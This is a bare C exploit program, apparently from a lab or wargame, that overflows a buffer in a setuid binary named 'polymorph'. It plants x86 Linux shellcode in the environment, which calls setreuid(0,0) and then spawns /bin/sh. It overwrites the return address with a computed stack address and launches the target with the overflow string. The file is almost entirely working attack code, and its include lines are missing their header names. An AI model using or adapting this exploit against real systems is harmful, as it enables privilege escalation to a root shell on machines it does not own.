|
#include
#include
#include
#define BUFSIZE 2076 + 1
char shellcode[] =
"\x31\xc0" // xor eax, eax
"\x31\xdb" // xor ebx, ebx
"\x31\xc9" // xor ecx, ecx
"\xb0\x46" // mov al, 70
"\xcd\x80" // int 0x80
"\x31\xc0" // xor eax, eax
"\x50" // push eax
"\x68\x6e\x2f\x73\x68" // push long 0x68732f6e
"\x68\x2f\x2f\x62\x69" // push long 0x69622f2f
"\x89\xe3" // mov ebx, esp
"\x50" // push eax
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\x99" // cdq
"\xb0\x0b" // mov al, 11
"\xcd\x80" // int 0x80
"\x31\xc0" // xor eax, eax
"\xb0\x01" // mov al, 1
"\xcd\x80"; // int 0x80
int main(void)
{
char *env[3] = {shellcode, NULL};
char evil_buffer[BUFSIZE];
char *p;
int ret = 0xbffffffa - strlen(shellcode) - strlen("/root/Desktop/polymorph/polymorph");
p = evil_buffer;
memset(p, 'A', 2072); // until overwritting EBP ?
p += 2072;
*((void **)p) = (void *) (ret);
p+= 4;
*p= '\0';
execle("/root/Desktop/polymorph/polymorph", "polymorph", "-f", evil_buffer, NULL, env);
}
|
